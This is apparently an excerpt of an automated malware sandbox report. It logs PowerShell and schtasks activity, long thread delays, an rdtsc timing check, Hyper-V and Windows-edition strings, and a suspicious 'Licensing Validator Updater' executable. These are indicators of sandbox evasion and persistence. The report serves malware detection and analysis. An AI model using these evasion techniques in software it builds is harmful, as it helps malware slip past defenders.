Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00000271256F2377 rdtsc 8_2_00000271256F2377
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1917Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7992Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2182
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7650
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1320
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2661
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1079
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7209
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5492Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep count: 2182 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep count: 7650 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe TID: 1732Thread sleep time: -34000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe TID: 7012Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1060Thread sleep count: 1320 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5928Thread sleep count: 2661 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3492Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588Thread sleep count: 1079 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588Thread sleep count: 7209 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeFile Volume queried: C:\Users\user\AppData\Roaming\Licensing Validator Updater FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeFile Volume queried: C:\Users\user\AppData\Roaming\Licensing Validator Updater FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeFile Volume queried: C:\Users\user\AppData\Roaming\Licensing Validator Updater FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFEB3192C90 GetSystemInfo,20_2_00007FFEB3192C90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: firefox.exe, 00000006.00000002.2631555644.000002A679E3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWu
Source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Standard (without Hyper-V)
Source: firefox.exe, 00000008.00000002.2658542490.0000027125D60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc)
Source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Hyper-V
Source: ModuleAnalysisCache.20.drBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Standard (core installation without Hyper-V)
Source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Enterprise (core installation without Hyper-V)
Source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Datacenter (core installation without Hyper-V)
Source: firefox.exe, 00000006.00000002.2631555644.000002A679E3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
Source: ModuleAnalysisCache.20.drBinary or memory string: Add-NetEventVmNetworkAdapter
Source: firefox.exe, 0000000A.00000002.2629114543.00000129186CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPc
Source: firefox.exe, 00000008.00000002.2658542490.0000027125D60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW6634-1003_Classes
Source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Essential Server Solutions (without Hyper-V)
Source: firefox.exe, 0000000A.00000002.2657246252.0000012918B00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: firefox.exe, 00000003.00000003.1635930320.000001CA7F2B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2657526488.000002A67A21B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Cluster Server (without Hyper-V)
Source: firefox.exe, 00000008.00000002.2627031954.00000271254AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW i
Source: ModuleAnalysisCache.20.drBinary or memory string: Get-NetEventVmNetworkAdapter
Source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Enterprise (without Hyper-V)
Source: firefox.exe, 00000006.00000002.2659811254.000002A67A300000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2658542490.0000027125D60000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000021.00000002.2623905798.000001C1E1ED2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: /%d%.15e%s%s%f%sOS random string generation failed, exitingguirpc.GetProductInfokernel32.dllMicrosoft Windows 11Windows 10Windows Server 23H2Windows Server 2022Windows Server 2019Windows Server 2016Windows 10 BetaWindows 10 Server BetaWindows 8.1Windows Server 2012 R2Windows 8Windows Server 2012Windows 7Windows Server 2008 "R2"Windows VistaWindows Server 2008Windows XPWindows Server 2003 "R2"Windows Server 2003Windows XPWindows 2000Windows NTWindows 95Windows 98Windows MillenniumWin32s, (%.2u.%.2u.%.4u.%.2u)Business Business N Core Core Core Core N Education Education N Embedded Standard Enterprise Enterprise E Enterprise N Enterprise N (Evaluation) Enterprise LTSB Enterprise LTSB Evaluation Enterprise LTSB N Enterprise LTSB N Evaluation Home Basic Home Basic E Home Basic N Home Premium Home Premium E Home Premium N IoT Enterprise IoT Enterprise LTSC Internet of Things Developer Preview Developer Preview N Professional Professional E Professional N Professional S Professional SN Professional with Media Center Starter Starter E Starter N ThinPC Ultimate Ultimate E Ultimate N Pro for Workstations Pro for Workstations N Home Professional Home Tablet PC Media Center Starter Professional Professional Workstation ARM64 Server Azure Stack HCI Cloud Host Infrastructure Server Cloud Storage Server Cluster Server Cluster Server (without Hyper-V) Datacenter (Evaluation) Datacenter, Semi-Annual Channel (core installation) Standard, Semi-Annual Channel (core installation) Datacenter Datacenter Azure Datacenter (core installation) Datacenter Azure (core installation) Datacenter (core installation without Hyper-V) Datacenter (without Hyper-V) Enterprise (Evaluation) Enterprise Enterprise (core installation) Enterprise (core installation without Hyper-V) Enterprise Enterprise (without Hyper-V) Essential Server Solution Additional Essential Server Solution Additional SVC Essential Server Solution Management Essential Server Solution Management SVC Home Server 2011Storage Server Essentials Hyper-V Essential Business Server Management Server Essential Business Server Messaging Server Essential Business Server Security Server MultiPoint Server Premium MultiPoint Server Standard Nano Server Essential Server Solutions Essential Server Solutions (without Hyper-V) Foundation Small Business ServerSmall Business Server Premium Small Business Server Premium (core installation) MultiPoint Server MultiPoint Server (core installation) Standard (Evaluation) Standard Standard (core installation) Standard (core installation without Hyper-V) Standard (without Hyper-V) Storage Server Enterprise Storage Server Enterprise (core installation) Storage Server Express Storage Server Express (core installation) Storage Server Standard (Evaluation) Storage Server Standard Storage Server Standard (core installation) Storage Server Workgroup 